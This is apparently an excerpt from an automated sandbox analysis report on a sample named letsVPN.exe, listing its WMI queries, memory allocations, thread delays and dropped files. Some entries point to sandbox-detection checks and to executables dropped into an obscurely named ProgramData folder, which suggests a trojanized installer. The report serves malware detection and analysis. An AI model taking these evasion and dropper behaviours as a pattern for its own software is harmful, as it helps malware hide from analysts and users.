              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID=&quot;{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID=&quot;10&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName=&quot;tap0901&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID=&quot;{EF9D9576-0BA6-485B-A9BA-E5D5D7189092}&quot;
              Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: FE0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2CB0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 1240000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 960000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 24D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 44D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 2420000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 24D0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: 44D0000 memory reserve | memory write watch
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: memset,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,memcpy,GlobalFree,??3@YAXPAX@Z,19_2_005260A0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961920D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,33_2_00007FF7961920D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7553
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2099
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWindow / User API: threadDelayed 5283
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWindow / User API: threadDelayed 3558
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsProcess.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETBDCE.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeDropped PE file which has not been started: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsDialogs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dllJump to dropped file
